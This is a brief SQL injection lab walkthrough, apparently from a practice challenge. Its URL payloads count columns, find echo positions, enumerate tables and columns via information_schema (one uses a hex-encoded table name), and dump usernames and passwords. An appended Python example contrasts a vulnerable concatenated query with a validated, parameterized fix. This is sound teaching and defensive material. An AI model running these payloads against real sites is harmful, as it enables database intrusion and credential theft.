Determine the injection type
id=2 and 1=1 and id=2 and 1=2 return different results, so this is a numeric-type injection
Determine the number of columns
?id=2%20order%20by%204
Find the echo (display) positions
?id=-2%20union%20select%201,2,3
Get the database name
Get the table names
?id=-2%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
Get the column names
This level still has the wide-byte issue, so the table name has to be written in hexadecimal (0x7573657273 is the string "users")
?id=-2%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273
Usernames and passwords
?id=-2%20union%20select%201,group_concat(username),group_concat(password)%20from%20users
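Added example (not part of the original walkthrough): a small Python/sqlite3 model of the numeric-type query behind the first three steps, with the vulnerable string-concatenation form next to the validated, parameterized fix. It reproduces why `and 1=1` / `and 1=2` differ and why `-2 union select 1,2,3` surfaces a marker row, and shows both effects disappear once the id is checked and bound. The `users` table, its rows and the function names are constructed assumptions, not the lab's own code.

```python
import sqlite3

# Constructed sample schema and rows (assumption, not the lab's real database).
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
""")

_SQL = "SELECT id, username, password FROM users WHERE id="


def lookup_unsafe(user_id: str) -> list:
    """Numeric-type query built by pasting the raw parameter into the SQL text.

    No quotes surround the value, so anything after the number becomes SQL:
    'and 1=2' empties the result, '-2 union select 1,2,3' appends a row whose
    columns are fully attacker-controlled (the "echo points" of the walkthrough).
    """
    return _conn.execute(_SQL + user_id).fetchall()


def lookup_safe(user_id: str) -> list:
    """Hardened form: reject anything that is not a plain positive integer,
    then bind the value as a parameter instead of interpolating it."""
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    return _conn.execute(_SQL + "?", (int(user_id),)).fetchall()


def safe_rejects(user_id: str) -> bool:
    """True when the hardened lookup refuses the input (used for checking)."""
    try:
        lookup_safe(user_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for probe in ("2", "2 and 1=1", "2 and 1=2", "-2 union select 1,2,3"):
        print(f"{probe!r:28} unsafe -> {lookup_unsafe(probe)}  "
              f"safe rejects -> {safe_rejects(probe)}")
```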